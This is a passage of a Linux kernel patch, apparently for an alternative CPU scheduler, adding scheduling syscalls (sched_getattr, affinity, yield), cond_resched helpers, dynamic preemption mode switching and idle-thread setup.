++		return -EINVAL;
++
++	retval = sched_copy_attr(uattr, &attr);
++	if (retval)
++		return retval;
++
++	if ((int)attr.sched_policy < 0)
++		return -EINVAL;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setattr(p, &attr);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
++ * @pid: the pid in question.
++ *
++ * Return: On success, the policy of the thread. Otherwise, a negative error
++ * code.
++ */
++SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
++{
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (pid < 0)
++		goto out_nounlock;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (p) {
++		retval = security_task_getscheduler(p);
++		if (!retval)
++			retval = p->policy;
++	}
++	rcu_read_unlock();
++
++out_nounlock:
++	return retval;
++}
++
++/**
++ * sys_sched_getparam - get the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the RT priority.
++ *
++ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
++ * code.
++ */
++SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
++{
++	struct sched_param lp = { .sched_priority = 0 };
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (!param || pid < 0)
++		goto out_nounlock;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	if (task_has_rt_policy(p))
++		lp.sched_priority = p->rt_priority;
++	rcu_read_unlock();
++
++	/*
++	 * This one might sleep, we cannot do it with a spinlock held ...
++	 */
++	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
++
++out_nounlock:
++	return retval;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/*
++ * Copy the kernel size attribute structure (which might be larger
++ * than what user-space knows about) to user-space.
++ *
++ * Note that all cases are valid: user-space buffer can be larger or
++ * smaller than the kernel-space buffer. The usual case is that both
++ * have the same size.
++ */
++static int
++sched_attr_copy_to_user(struct sched_attr __user *uattr,
++			struct sched_attr *kattr,
++			unsigned int usize)
++{
++	unsigned int ksize = sizeof(*kattr);
++
++	if (!access_ok(uattr, usize))
++		return -EFAULT;
++
++	/*
++	 * sched_getattr() ABI forwards and backwards compatibility:
++	 *
++	 * If usize == ksize then we just copy everything to user-space and all is good.
++	 *
++	 * If usize < ksize then we only copy as much as user-space has space for,
++	 * this keeps ABI compatibility as well. We skip the rest.
++	 *
++	 * If usize > ksize then user-space is using a newer version of the ABI,
++	 * which part the kernel doesn't know about. Just ignore it - tooling can
++	 * detect the kernel's knowledge of attributes from the attr->size value
++	 * which is set to ksize in this case.
++	 */
++	kattr->size = min(usize, ksize);
++
++	if (copy_to_user(uattr, kattr, kattr->size))
++		return -EFAULT;
++
++	return 0;
++}
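++
++/*
++ * Example of the compatibility rule above: an old tool passing
++ * usize == SCHED_ATTR_SIZE_VER0 receives only the VER0 fields, with
++ * kattr->size set to usize so the caller can tell how much the
++ * kernel actually filled in.
++ */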
++
++/**
++ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @usize: sizeof(attr) for fwd/bwd comp.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
++		unsigned int, usize, unsigned int, flags)
++{
++	struct sched_attr kattr = { };
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
++	    usize < SCHED_ATTR_SIZE_VER0 || flags)
++		return -EINVAL;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	kattr.sched_policy = p->policy;
++	if (p->sched_reset_on_fork)
++		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++	if (task_has_rt_policy(p))
++		kattr.sched_priority = p->rt_priority;
++	else
++		kattr.sched_nice = task_nice(p);
++	kattr.sched_flags &= SCHED_FLAG_ALL;
++
++#ifdef CONFIG_UCLAMP_TASK
++	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
++	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
++#endif
++
++	rcu_read_unlock();
++
++	return sched_attr_copy_to_user(uattr, &kattr, usize);
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
++{
++	int retval;
++	cpumask_var_t cpus_allowed, new_mask;
++
++	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
++		return -ENOMEM;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
++		retval = -ENOMEM;
++		goto out_free_cpus_allowed;
++	}
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	cpumask_and(new_mask, mask, cpus_allowed);
++again:
++	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
++	if (retval)
++		goto out_free_new_mask;
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	if (!cpumask_subset(new_mask, cpus_allowed)) {
++		/*
++		 * We must have raced with a concurrent cpuset
++		 * update. Just reset the cpus_allowed to the
++		 * cpuset's cpus_allowed
++		 */
++		cpumask_copy(new_mask, cpus_allowed);
++		goto again;
++	}
++
++out_free_new_mask:
++	free_cpumask_var(new_mask);
++out_free_cpus_allowed:
++	free_cpumask_var(cpus_allowed);
++	return retval;
++}
++
++long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
++{
++	struct task_struct *p;
++	int retval;
++
++	rcu_read_lock();
++
++	p = find_process_by_pid(pid);
++	if (!p) {
++		rcu_read_unlock();
++		return -ESRCH;
++	}
++
++	/* Prevent p going away */
++	get_task_struct(p);
++	rcu_read_unlock();
++
++	if (p->flags & PF_NO_SETAFFINITY) {
++		retval = -EINVAL;
++		goto out_put_task;
++	}
++
++	if (!check_same_owner(p)) {
++		rcu_read_lock();
++		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
++			rcu_read_unlock();
++			retval = -EPERM;
++			goto out_put_task;
++		}
++		rcu_read_unlock();
++	}
++
++	retval = security_task_setscheduler(p);
++	if (retval)
++		goto out_put_task;
++
++	retval = __sched_setaffinity(p, in_mask);
++out_put_task:
++	put_task_struct(p);
++	return retval;
++}
++
++static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
++			     struct cpumask *new_mask)
++{
++	if (len < cpumask_size())
++		cpumask_clear(new_mask);
++	else if (len > cpumask_size())
++		len = cpumask_size();
++
++	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
++}
++
++/**
++ * sys_sched_setaffinity - set the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to the new CPU mask
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	cpumask_var_t new_mask;
++	int retval;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
++	if (retval == 0)
++		retval = sched_setaffinity(pid, new_mask);
++	free_cpumask_var(new_mask);
++	return retval;
++}
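++
++/*
++ * Illustrative userspace sketch (glibc wraps this syscall as
++ * sched_setaffinity(2)): pin the calling thread to CPU 2:
++ *
++ *	cpu_set_t set;
++ *
++ *	CPU_ZERO(&set);
++ *	CPU_SET(2, &set);
++ *	sched_setaffinity(0, sizeof(set), &set);
++ */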
++
++long sched_getaffinity(pid_t pid, cpumask_t *mask)
++{
++	struct task_struct *p;
++	raw_spinlock_t *lock;
++	unsigned long flags;
++	int retval;
++
++	rcu_read_lock();
++
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	task_access_lock_irqsave(p, &lock, &flags);
++	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++out_unlock:
++	rcu_read_unlock();
++
++	return retval;
++}
++
++/**
++ * sys_sched_getaffinity - get the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to hold the current CPU mask
++ *
++ * Return: size of CPU mask copied to user_mask_ptr on success. An
++ * error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	int ret;
++	cpumask_var_t mask;
++
++	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
++		return -EINVAL;
++	if (len & (sizeof(unsigned long)-1))
++		return -EINVAL;
++
++	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	ret = sched_getaffinity(pid, mask);
++	if (ret == 0) {
++		unsigned int retlen = min_t(size_t, len, cpumask_size());
++
++		if (copy_to_user(user_mask_ptr, mask, retlen))
++			ret = -EFAULT;
++		else
++			ret = retlen;
++	}
++	free_cpumask_var(mask);
++
++	return ret;
++}
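++
++/*
++ * Note on the length checks above: @len must be a multiple of
++ * sizeof(unsigned long) and provide at least nr_cpu_ids bits; on
++ * success the syscall returns the number of bytes copied (typically
++ * 8 on a 64-bit kernel configured for at most 64 CPUs), not 0.
++ */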
++
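++/*
++ * Summary of the sched_yield_type values handled below: 0 - yield is
++ * a no-op, 1 - apply do_sched_yield_type_1() to non-RT tasks only,
++ * 2 - additionally mark current as rq->skip when other tasks are
++ * runnable, so it is passed over on the next pick.
++ */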
++static void do_sched_yield(void)
++{
++	struct rq *rq;
++	struct rq_flags rf;
++
++	if (!sched_yield_type)
++		return;
++
++	rq = this_rq_lock_irq(&rf);
++
++	schedstat_inc(rq->yld_count);
++
++	if (1 == sched_yield_type) {
++		if (!rt_task(current))
++			do_sched_yield_type_1(current, rq);
++	} else if (2 == sched_yield_type) {
++		if (rq->nr_running > 1)
++			rq->skip = current;
++	}
++
++	preempt_disable();
++	raw_spin_unlock_irq(&rq->lock);
++	sched_preempt_enable_no_resched();
++
++	schedule();
++}
++
++/**
++ * sys_sched_yield - yield the current processor to other threads.
++ *
++ * This function yields the current CPU to other tasks. If there are no
++ * other threads running on this CPU then this function will return.
++ *
++ * Return: 0.
++ */
++SYSCALL_DEFINE0(sched_yield)
++{
++	do_sched_yield();
++	return 0;
++}
++
++#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
++int __sched __cond_resched(void)
++{
++	if (should_resched(0)) {
++		preempt_schedule_common();
++		return 1;
++	}
++	/*
++	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
++	 * whether the current CPU is in an RCU read-side critical section,
++	 * so the tick can report quiescent states even for CPUs looping
++	 * in kernel context.  In contrast, in non-preemptible kernels,
++	 * RCU readers leave no in-memory hints, which means that CPU-bound
++	 * processes executing in kernel context might never report an
++	 * RCU quiescent state.  Therefore, the following code causes
++	 * cond_resched() to report a quiescent state, but only when RCU
++	 * is in urgent need of one.
++	 */
++#ifndef CONFIG_PREEMPT_RCU
++	rcu_all_qs();
++#endif
++	return 0;
++}
++EXPORT_SYMBOL(__cond_resched);
++#endif
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define cond_resched_dynamic_enabled	__cond_resched
++#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(cond_resched);
++
++#define might_resched_dynamic_enabled	__cond_resched
++#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(might_resched);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
++int __sched dynamic_cond_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_cond_resched);
++
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
++int __sched dynamic_might_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_might_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_might_resched);
++#endif
++#endif
++
++/*
++ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
++ * call schedule, and on return reacquire the lock.
++ *
++ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
++ * operations here to prevent schedule() from being called twice (once via
++ * spin_unlock(), once by hand).
++ */
++int __cond_resched_lock(spinlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held(lock);
++
++	if (spin_needbreak(lock) || resched) {
++		spin_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		spin_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_lock);
++
++int __cond_resched_rwlock_read(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_read(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		read_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		read_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_read);
++
++int __cond_resched_rwlock_write(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_write(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		write_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		write_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_write);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++
++#ifdef CONFIG_GENERIC_ENTRY
++#include <linux/entry-common.h>
++#endif
++
++/*
++ * SC:cond_resched
++ * SC:might_resched
++ * SC:preempt_schedule
++ * SC:preempt_schedule_notrace
++ * SC:irqentry_exit_cond_resched
++ *
++ *
++ * NONE:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * VOLUNTARY:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- __cond_resched
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * FULL:
++ *   cond_resched               <- RET0
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- preempt_schedule
++ *   preempt_schedule_notrace   <- preempt_schedule_notrace
++ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
++ */
++
++enum {
++	preempt_dynamic_undefined = -1,
++	preempt_dynamic_none,
++	preempt_dynamic_voluntary,
++	preempt_dynamic_full,
++};
++
++int preempt_dynamic_mode = preempt_dynamic_undefined;
++
++int sched_dynamic_mode(const char *str)
++{
++	if (!strcmp(str, "none"))
++		return preempt_dynamic_none;
++
++	if (!strcmp(str, "voluntary"))
++		return preempt_dynamic_voluntary;
++
++	if (!strcmp(str, "full"))
++		return preempt_dynamic_full;
++
++	return -EINVAL;
++}
++
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
++#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
++#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
++#else
++#error "Unsupported PREEMPT_DYNAMIC mechanism"
++#endif
++
++void sched_dynamic_update(int mode)
++{
++	/*
++	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
++	 * the ZERO state, which is invalid.
++	 */
++	preempt_dynamic_enable(cond_resched);
++	preempt_dynamic_enable(might_resched);
++	preempt_dynamic_enable(preempt_schedule);
++	preempt_dynamic_enable(preempt_schedule_notrace);
++	preempt_dynamic_enable(irqentry_exit_cond_resched);
++
++	switch (mode) {
++	case preempt_dynamic_none:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: none\n");
++		break;
++
++	case preempt_dynamic_voluntary:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_enable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: voluntary\n");
++		break;
++
++	case preempt_dynamic_full:
++		preempt_dynamic_disable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_enable(preempt_schedule);
++		preempt_dynamic_enable(preempt_schedule_notrace);
++		preempt_dynamic_enable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: full\n");
++		break;
++	}
++
++	preempt_dynamic_mode = mode;
++}
++
++static int __init setup_preempt_mode(char *str)
++{
++	int mode = sched_dynamic_mode(str);
++	if (mode < 0) {
++		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
++		return 0;
++	}
++
++	sched_dynamic_update(mode);
++	return 1;
++}
++__setup("preempt=", setup_preempt_mode);
++
++static void __init preempt_dynamic_init(void)
++{
++	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
++		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
++			sched_dynamic_update(preempt_dynamic_none);
++		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
++			sched_dynamic_update(preempt_dynamic_voluntary);
++		} else {
++			/* Default static call setting, nothing to do */
++			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
++			preempt_dynamic_mode = preempt_dynamic_full;
++			pr_info("Dynamic Preempt: full\n");
++		}
++	}
++}
++
++#define PREEMPT_MODEL_ACCESSOR(mode) \
++	bool preempt_model_##mode(void)						 \
++	{									 \
++		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
++		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
++	}									 \
++	EXPORT_SYMBOL_GPL(preempt_model_##mode)
++
++PREEMPT_MODEL_ACCESSOR(none);
++PREEMPT_MODEL_ACCESSOR(voluntary);
++PREEMPT_MODEL_ACCESSOR(full);
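++
++/*
++ * For illustration: each PREEMPT_MODEL_ACCESSOR() expansion above
++ * defines one exported predicate, e.g. preempt_model_full() returns
++ * true iff preempt_dynamic_mode == preempt_dynamic_full.
++ */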
++
++#else /* !CONFIG_PREEMPT_DYNAMIC */
++
++static inline void preempt_dynamic_init(void) { }
++
++#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
++
++/**
++ * yield - yield the current processor to other threads.
++ *
++ * Do not ever use this function, there's a 99% chance you're doing it wrong.
++ *
++ * The scheduler is at all times free to pick the calling task as the most
++ * eligible task to run, if removing the yield() call from your code breaks
++ * it, it's already broken.
++ *
++ * Typical broken usage is:
++ *
++ * while (!event)
++ * 	yield();
++ *
++ * where one assumes that yield() will let 'the other' process run that will
++ * make event true. If the current task is a SCHED_FIFO task that will never
++ * happen. Never use yield() as a progress guarantee!!
++ *
++ * If you want to use yield() to wait for something, use wait_event().
++ * If you want to use yield() to be 'nice' for others, use cond_resched().
++ * If you still want to use yield(), do not!
++ */
++void __sched yield(void)
++{
++	set_current_state(TASK_RUNNING);
++	do_sched_yield();
++}
++EXPORT_SYMBOL(yield);
++
++/**
++ * yield_to - yield the current processor to another thread in
++ * your thread group, or accelerate that thread toward the
++ * processor it's on.
++ * @p: target task
++ * @preempt: whether task preemption is allowed or not
++ *
++ * It's the caller's job to ensure that the target task struct
++ * can't go away on us before we can do any checks.
++ *
++ * In Alt schedule FW, yield_to is not supported.
++ *
++ * Return:
++ *	true (>0) if we indeed boosted the target task.
++ *	false (0) if we failed to boost the target.
++ *	-ESRCH if there's no task to yield to.
++ */
++int __sched yield_to(struct task_struct *p, bool preempt)
++{
++	return 0;
++}
++EXPORT_SYMBOL_GPL(yield_to);
++
++int io_schedule_prepare(void)
++{
++	int old_iowait = current->in_iowait;
++
++	current->in_iowait = 1;
++	blk_flush_plug(current->plug, true);
++	return old_iowait;
++}
++
++void io_schedule_finish(int token)
++{
++	current->in_iowait = token;
++}
++
++/*
++ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
++ * that process accounting knows that this is a task in IO wait state.
++ *
++ * But don't do that if it is a deliberate, throttling IO wait (this task
++ * has set its backing_dev_info: the queue against which it should throttle)
++ */
++
++long __sched io_schedule_timeout(long timeout)
++{
++	int token;
++	long ret;
++
++	token = io_schedule_prepare();
++	ret = schedule_timeout(timeout);
++	io_schedule_finish(token);
++
++	return ret;
++}
++EXPORT_SYMBOL(io_schedule_timeout);
++
++void __sched io_schedule(void)
++{
++	int token;
++
++	token = io_schedule_prepare();
++	schedule();
++	io_schedule_finish(token);
++}
++EXPORT_SYMBOL(io_schedule);
++
++/**
++ * sys_sched_get_priority_max - return maximum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the maximum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = MAX_RT_PRIO - 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++/**
++ * sys_sched_get_priority_min - return minimum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the minimum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
++{
++	struct task_struct *p;
++	int retval;
++
++	alt_sched_debug();
++
++	if (pid < 0)
++		return -EINVAL;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++	rcu_read_unlock();
++
++	*t = ns_to_timespec64(sched_timeslice_ns);
++	return 0;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/**
++ * sys_sched_rr_get_interval - return the default timeslice of a process.
++ * @pid: pid of the process.
++ * @interval: userspace pointer to the timeslice value.
++ *
++ *
++ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
++ * an error code.
++ */
++SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
++		struct __kernel_timespec __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_timespec64(&t, interval);
++
++	return retval;
++}
++
++#ifdef CONFIG_COMPAT_32BIT_TIME
++SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
++		struct old_timespec32 __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_old_timespec32(&t, interval);
++	return retval;
++}
++#endif
++
++void sched_show_task(struct task_struct *p)
++{
++	unsigned long free = 0;
++	int ppid;
++
++	if (!try_get_task_stack(p))
++		return;
++
++	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
++
++	if (task_is_running(p))
++		pr_cont("  running task    ");
++#ifdef CONFIG_DEBUG_STACK_USAGE
++	free = stack_not_used(p);
++#endif
++	ppid = 0;
++	rcu_read_lock();
++	if (pid_alive(p))
++		ppid = task_pid_nr(rcu_dereference(p->real_parent));
++	rcu_read_unlock();
++	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
++		free, task_pid_nr(p), ppid,
++		read_task_thread_flags(p));
++
++	print_worker_info(KERN_INFO, p);
++	print_stop_info(KERN_INFO, p);
++	show_stack(p, NULL, KERN_INFO);
++	put_task_stack(p);
++}
++EXPORT_SYMBOL_GPL(sched_show_task);
++
++static inline bool
++state_filter_match(unsigned long state_filter, struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/* no filter, everything matches */
++	if (!state_filter)
++		return true;
++
++	/* filter, but doesn't match */
++	if (!(state & state_filter))
++		return false;
++
++	/*
++	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
++	 * TASK_KILLABLE).
++	 */
++	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
++		return false;
++
++	return true;
++}
++
++
++void show_state_filter(unsigned int state_filter)
++{
++	struct task_struct *g, *p;
++
++	rcu_read_lock();
++	for_each_process_thread(g, p) {
++		/*
++		 * reset the NMI-timeout, listing all files on a slow
++		 * console might take a lot of time:
++		 * Also, reset softlockup watchdogs on all CPUs, because
++		 * another CPU might be blocked waiting for us to process
++		 * an IPI.
++		 */
++		touch_nmi_watchdog();
++		touch_all_softlockup_watchdogs();
++		if (state_filter_match(state_filter, p))
++			sched_show_task(p);
++	}
++
++#ifdef CONFIG_SCHED_DEBUG
++	/* TODO: Alt schedule FW should support this
++	if (!state_filter)
++		sysrq_sched_debug_show();
++	*/
++#endif
++	rcu_read_unlock();
++	/*
++	 * Only show locks if all tasks are dumped:
++	 */
++	if (!state_filter)
++		debug_show_all_locks();
++}
++
++void dump_cpu_task(int cpu)
++{
++	if (cpu == smp_processor_id() && in_hardirq()) {
++		struct pt_regs *regs;
++
++		regs = get_irq_regs();
++		if (regs) {
++			show_regs(regs);
++			return;
++		}
++	}
++
++	if (trigger_single_cpu_backtrace(cpu))
++		return;
++
++	pr_info("Task dump for CPU %d:\n", cpu);
++	sched_show_task(cpu_curr(cpu));
++}
++
++/**
++ * init_idle - set up an idle thread for a given CPU
++ * @idle: task in question
++ * @cpu: CPU the idle task belongs to
++ *
++ * NOTE: this function does not set the idle thread's NEED_RESCHED
++ * flag, to make booting more robust.
++ */
++void __init init_idle(struct task_struct *idle, int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	__sched_fork(0, idle);
++
++	raw_spin_lock_irqsave(&idle->pi_lock, flags);
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	idle->last_ran = rq->clock_task;
++	idle->__state = TASK_RUNNING;
++	/*
++	 * PF_KTHREAD should already be set at this point; regardless, make it
++	 * look like a proper per-CPU kthread.
++	 */
++	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
++	kthread_set_per_cpu(idle, cpu);
++
++	sched_queue_init_idle(&rq->queue, idle);
++
++#ifdef CONFIG_SMP
++	/*
++	 * It's possible that init_idle() gets called multiple times on a task,
++	 * in that case do_set_cpus_allowed() will not do the right thing.
++	 *
++	 * And since this is boot we can forgo the serialisation.
++	 */
++	set_cpus_allowed_common(idle, cpumask_of(cpu));
++#endif
++
++	/* Silence PROVE_RCU */
++	rcu_read_lock();
++	__set_task_cpu(idle, cpu);
++	rcu_read_unlock();
++
++	rq->idle = idle;
++	rcu_assign_pointer(rq->curr, idle);
++	idle->on_cpu = 1;
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
++
++	/* Set the preempt count _outside_ the spinlocks! */
++	init_idle_preempt_count(idle, cpu);
++
++	ftrace_graph_init_idle_task(idle, cpu);
++	vtime_init_idle(idle, cpu);
++#ifdef CONFIG_SMP
++	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
++			      const struct cpumask __maybe_unused *trial)
++{
++	return 1;
++}
++
++int task_can_attach(struct task_struct *p,
++		    const struct cpumask *cs_effective_cpus)
++{
++	int ret = 0;
++
++	/*
++	 * Kthreads which disallow setaffinity shouldn't be moved
++	 * to a new cpuset; we don't want to change their CPU
++	 * affinity and isolating such threads by their set of
++	 * allowed nodes is unnecessary.  Thus, cpusets are not
++	 * applicable for such threads.  This prevents checking for
++	 * success of set_cpus_allowed_ptr() on all attached tasks
